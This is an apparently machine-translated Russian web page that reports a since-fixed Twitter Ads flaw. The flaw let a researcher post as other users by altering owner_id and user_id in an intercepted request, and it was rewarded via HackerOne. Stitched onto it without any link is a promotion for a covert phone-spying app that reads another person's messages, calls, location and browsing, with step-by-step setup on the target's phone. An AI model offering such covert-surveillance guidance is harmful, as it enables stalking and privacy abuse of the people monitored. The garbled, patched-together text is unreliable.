Баг в твиттер позволил злоумышленнику писать в твиттере от вашего имени

Twitter исправил ошибку в своей службе Twitter Ads, которая могла позволить злоумышленнику писать в Twitter, как и любой другой пользователь.

До того, как в начале этого года он был исправлен, недостаток в Twitter мог позволить злоумышленнику писать в твиттере, как и любой другой пользователь.

Twitter быстро решил проблему, исправив ее через три дня после того, как исследователь — охотник за ошибками, который работает с кедришем, — сообщил об этом через HackerOne. Кедриш обнаружил уязвимость в феврале и получил награду в размере 7560 долларов США через несколько дней в марте. Исследователь опубликовал подробности о недостатке ранее в этом месяце, но билет HackerOne был обнародован только в понедельник.

Уязвимость была связана с рекламной платформой Twitter, ads.twitter.com, платформой самообслуживания, которая позволяет компаниям продвигать твиттеры, счета и отслеживать рекламные кампании в социальных сетях.

Согласно записи уязвимости Кедриша, он смог перехватить запрос и изменить два параметра, owner_id и user_id, на tweet в качестве другого пользователя.

Сначала он получил несколько сообщений об ошибках, но в конце концов получил ответ, что его твиттер был успешно опубликован. Уязвимость, по крайней мере вначале, зависела от того, что злоумышленник загрузил медиафайл, например, изображение, в твиттер, который он хочет отправить. По словам Кедриша, простого наличия изображения недостаточно, злоумышленнику необходимо имя файла, связанное с изображением, Media_key, что-то, что может быть трудно определить.

«Пользователь, который мы используем для публикации, должен иметь загруженный медиа-файл. Более того, необходимо знать Media_key этого файла, и его практически невозможно раскрыть грубой силой, так как он содержит 18 цифр, — писал Кедриш, — В своих исследованиях я не нашел 100% способ узнать этот Media_key. Всегда существовали некоторые ограничения и обстоятельства, позволяющие получить этот Media_key.»

Загрузив файл изображения и поделившись им с пользователем — что позволяет Twitter Ads — Кедриш понял, что он может совершить такую же атаку без 18-значного кода. Вместо этого он обнаружил, что может перехватить тот же почтовый запрос, который посылается в Twitter, когда пользователь пишет в Twitter и меняет ручку Twitter.

В Twitter уязвимость была отмечена как высокая степень серьезности, согласно отчету Kedrisch HackerOne.

«Эта ошибка была исправлена сразу же после сортировки, и не было обнаружено никаких доказательств использования этого дефекта кем-либо, кроме репортера», — сообщил Threatpost в среду в Twitter.

Согласно странице HackerOne в Twitter, компания выплатила $703 240 исследователям за ошибки с момента запуска своей баговой программы в мае 2014 года. Хотя вознаграждение Кедриша в размере $7,560 может показаться некоторым невысоким, оно соответствует тому, что компания регулярно платит за «Значительное обход аутентификации» в Core Twitter: $7,500. Уязвимости удаленного выполнения кода в сервисе могут достигать в два раза больше, $15 000.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *